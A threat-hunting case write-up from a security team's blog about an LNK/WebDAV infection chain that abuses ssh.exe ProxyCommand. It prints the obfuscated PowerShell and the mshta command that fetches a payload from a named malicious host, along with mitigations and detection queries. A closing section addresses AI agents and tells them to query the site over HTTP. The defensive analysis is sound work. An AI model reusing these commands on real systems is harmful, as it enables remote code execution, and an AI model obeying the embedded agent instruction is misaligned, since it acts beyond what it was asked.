# Hunter-Case-01 - SSH Proxy Command Lolbas

* ## Client-Side Exploitation: abusing WebDAV+URL+LNK to Deliver Malicious Payloads

## 1.) Information

<mark style="color:blue;">**Hunter Blue's**</mark> day started with an interesting Case we had seen on an infected Device later also seen on many others which was not Prevented neither Detected or alerted by XDR System.

<mark style="color:red;">**This is the reason why you should**</mark> check the initial entry point on a malware infection and don't trust blindly only on EDR or XDR Systems Detections.

You should investigate the initial Entry and Execution to search through the logs with these IoCs / IoAs to find the right artifacts for Threat Hunting.

### 1.1) Information Links and Research

* Lolbas SSH Option to use ProxyCommand: <https://lolbas-project.github.io/lolbas/Binaries/Ssh/>
* SSH Option to use ProxyCommand: <https://man.openbsd.org/ssh>
* Dynamic Malware Analysis for such files uploaded by other infected Companies before <https://any.run/report/39fcf6143a801de8acba009ef69ac4f7b533d8e1b91337547ca578f2b7117534/11a68474-4e9a-4070-9b23-b8d244c9fc02>
* <https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/search-spoof-abuse-of-windows-search-to-redirect-to-malware/>[
  ](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/search-spoof-abuse-of-windows-search-to-redirect-to-malware/&#xD;&#xA;https://www.oneconsult.com/en/blog/digital-forensics/batch-file-obfuscation-incident/&#xD;&#xA;https://security.f0r3idd3n-n3tw0rk2.ch/r3v3rse-engineering-and-f0r3nsik/digital-forensic-analyst-course/windows-forensic/windows-registry#id-6.6-user-searches&#xD;&#xA;https://trustedsec.com/blog/oops-i-udld-it-again>)
* <https://www.oneconsult.com/en/blog/digital-forensics/batch-file-obfuscation-incident/>[
  ](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/search-spoof-abuse-of-windows-search-to-redirect-to-malware/&#xD;&#xA;https://www.oneconsult.com/en/blog/digital-forensics/batch-file-obfuscation-incident/&#xD;&#xA;https://security.f0r3idd3n-n3tw0rk2.ch/r3v3rse-engineering-and-f0r3nsik/digital-forensic-analyst-course/windows-forensic/windows-registry#id-6.6-user-searches&#xD;&#xA;https://trustedsec.com/blog/oops-i-udld-it-again>)
* <https://trustedsec.com/blog/oops-i-udld-it-again>
* -> Further Research: <https://any.run/cybersecurity-blog/client-side-exploitation/>
* -> Further Intensive and best Research Information about the same Case we saw: <https://cyble.com/blog/threat-actor-targets-manufacturing-industry-with-malware/>

## 2.) Attack Chain

<figure><img src="/files/Tba441Ymab29ZPrpDfQm" alt=""><figcaption></figcaption></figure>

## Other Seen Infection Chains from our Cases

<figure><img src="/files/yvPQ4G2wjUr3O0HKmDxE" alt=""><figcaption></figcaption></figure>

## 3.) Initial Access

<mark style="color:red;">**UPDATE 06122024: In our case we have seen in SOC  is that the user was surfing through the internet and searching for some manuals and found a PDF link which he then clicked on and started the initial infection chain.**</mark>

Infection chain where a user downloaded an LNK file first (via the rundll32.exe WebDAV method).&#x20;

<figure><img src="/files/jtOHdghMAH9OJWv63CIU" alt=""><figcaption></figcaption></figure>

The LNK file will run ssh.exe (C:\Windows\System32\OpenSSH\ssh.exe) with the following parameter:

&#x20;

"-o ProxyCommand= "powershell powershell -Command ('msh]]]]]]]t]]]]]]]a.e]]]]]]x]]]]]]e ]]]]]]h]]]]]tt]]]]]]p]]]]]s:]]]]]]/]]]]]]]/berb.f]]]]]it]]]]]n]]]]]]]e]]]]]]]ssclu]]]]]]]b]]]]]]]-]]]]]f]]]]]]il]]]]]m]]]]]]fan]]]]]atics]]]]].co]]]]]]m]]]]]/]]]]]]z.]]]]]]]m]]]]]p]]]]]]]4]]]]]]' -replace']')".

* Obfuscated Powershell

  <figure><img src="/files/I7Y8tEub1y7oWiz30lDg" alt=""><figcaption></figcaption></figure>

The PowerShell command will spawn mshta.exe, thus downloading and executing additional code on the host:

mshta.exe **hxxps\[:]//berb.fitnessclub-filmfanatics.com/z\[.]mp4**

* Malicious mp4 File Downloaded

  <figure><img src="/files/RcLdkH1BNz5khhPkWGTy" alt=""><figcaption></figcaption></figure>

```cpp
#Rundll32.exe downloading a LNK File
rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie download-695-18112-001-webdav-logicaldoc.cdn-serveri4731-ns.shop@SSL https://download-695-18112-001-webdav-logicaldoc.cdn-serveri4731-ns.shop/Downloads/18112.2022/Instruction_695-18121-002_Rev.PDF.lnk

#LNK File
Windows\System32\OpenSSH\ssh.exe -o ProxyCommand=".....

executing

#Powershell Obfuscated Command
Process : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Started with CMD : powershell powershell -Command ('msh]]]]]]]t]]]]]]]a.e]]]]]]x]]]]]]e ]]]]]]h]]]]]tt]]]]]]p]]]]]s:]]]]]]/]]]]]]]/berb.f]]]]]it]]]]]n]]]]]]]e]]]]]]]ssclu]]]]]]]b]]]]]]]-]]]]]f]]]]]]il]]]]]m]]]]]]fan]]]]]atics]]]]].co]]]]]]m]]]]]/]]]]]]z.]]]]]]]m]]]]]p]]]]]]]4]]]]]]'  -replace ']')


#Deobfuscated Command
Process : C:\Windows\System32\mshta.exe Started with CMD : "C:\WINDOWS\system32\mshta.exe" https://berb.fitnessclub-filmfanatics.com/z.mp4

```

## 4.) Finding through Threat Hunting

* The Powershell Script was blocked by the XDR System but if you only trust in this Event you will not find the golden information behind this Attack
* We hunted through the Datalake logs in the whole infrastructure and, **yes you guess it right**, we found another host executing the same stuff to download the malicious file from this WebDav Server but nothing was Detected or Blocked until the obfuscated Powershell execution.

## 5.) Mitigation

* The initial breach may occur via spam emails.
  * Limit Email Attachements to known and legit files (Whitelisting and no Blacklisting) on Email GW
* <mark style="color:red;">**UPDATE 06122024: In our case we have seen in SOC  is that the user was surfing through the internet and searching for some manuals and found a PDF link which he then clicked on and started the initial infection chain.**</mark>
  * Therefore Awareness Trainings is essential in your company to teach your users in an easy way how such malicious operations are executed (Do some fun Awareness Campaigns so that your users learn something and do not blame them as they do not know these attacks ;) )
* Attack Surface Reduction Rules for Application to reduce the execution chain of malicious files
* Application Control to block malicious executions or Next Gen WDAC
  * <https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/appcontrol-and-applocker-overview>
  * <https://www.ninjaone.com/blog/understanding-windows-defender-application-control-wdac/#:~:text=Key%20features%20of%20WDAC&text=By%20strictly%20adhering%20to%20application,infections%20and%20other%20security%20breaches.>
* Monitor for WebDAV Requests as it is using HTTP and blocking SMB to outside will not reduce this attack
  * Consider disabling the execution of shortcut files (.lnk) originating from remote locations, such as WebDAV links, or implementing policies that require explicit user consent before executing such files.
* **Exercise Caution:** Only download and open files from trusted and verified sources.
* **Check File Extensions:** Ensure files have appropriate extensions before opening (e.g., .pdf for PDFs).
* **Report Suspicious Activity:** If you encounter unexpected files or activities, report them immediately for further investigation.

## 6.) Detection and Hunting

* Hunting for malicious "ProxyCommand=" values within the SSH arguments.&#x20;
* Hunting for \~ davclnt.dll,DavSetCookie download Commands should be definitely operated in your environment -> see executed Command&#x20;
* Also my colleague from Incident Response Team explained it in his Blogpost: <https://dfir.ch/posts/search-ms_protocol_handler/> if you want to check how such commands are misused by Threat Actors.
* Specific indicators include the use of the search-ms URI protocol in HTML files, unexpected pop-ups requesting access to Windows Explorer, and subsequent attempts to access remote servers using the WebDAV protocol.&#x20;
* Monitoring for the creation or execution of LNK files pointing to batch scripts will also be a focus.

### 6.1) Sigma Rules

* <https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml>

### 6.2) Yara Rules

* <https://any.run/cybersecurity-blog/client-side-exploitation/>

<figure><img src="/files/eHUVlorjbX8dGS0RPcup" alt=""><figcaption></figcaption></figure>

### 6.3) Hunting Queries Tanium

```cpp
#This query detects processes where `rundll32.exe` is used to execute `davclnt.dll`, often associated with WebDAV activity. C:\Windows\system32\svchost.exe -k LocalService -p -s WebClient
Get Trace Executed Processes[1 month,1654090734975|1654094333975,1,0,100,0,"","(?i).*svchost.exe","(?i).*rundll32.exe.*DavSetCookie.*","","",""] from all machines with Is Windows contains true
Get Trace Executed Processes[1 month,1654090734975|1654094333975,1,0,100,0,"","(?i).*svchost.exe","(?i).*rundll32.exe.*davclnt.dll.*","","",""] from all machines with Is Windows contains true
 
 

```

### 6.4) Hunting Queries Defender XDR

```cpp
#This query detects processes where `rundll32.exe` is used to execute `davclnt.dll`, often associated with WebDAV activity.
#use it also without @SSL and with @80 in Commandline
DeviceProcessEvents
| where ProcessCommandLine contains 'rundll32.exe' and ProcessCommandLine contains 'davclnt.dll'
| where ProcessCommandLine contains "@SSL"
| project Timestamp, DeviceName, AccountName, AccountUpn, InitiatingProcessCommandLine, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessFolderPath, ProcessCommandLine, FolderPath, FileName


  
#use it also without @SSL and with @80 in Commandline
DeviceProcessEvents
| where FileName == "rundll32.exe"
| where ProcessCommandLine contains "davclnt.dll"
| where ProcessCommandLine contains "@SSL"
| project Timestamp, DeviceName, AccountName, AccountUpn, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessFolderPath, ProcessCommandLine, FolderPath, FileName

 
 
#use it also without @SSL and with @80 in Commandline
DeviceProcessEvents
| where FileName == "rundll32.exe"
| where ProcessCommandLine contains "davclnt.dll"
| project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessCommandLine, InitiatingProcessFileName, AccountName
| where ProcessCommandLine !contains "Interner-Server"
| where ProcessCommandLine contains "cloudflare" 
| where ProcessCommandLine contains "@SSL"
| project Timestamp, DeviceName, AccountName, AccountUpn, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessFolderPath, ProcessCommandLine, FolderPath, FileName

 
 
 
```

## 7.) Conclusion and Learning for a Hunter Blue

* The EDR on this host didn't pick up the malicious WebDAV commands, showcasing how fruitful **threat hunting** can be.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.hunter-blue.ch/cases/hunter-case-01-ssh-proxy-command-lolbas.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.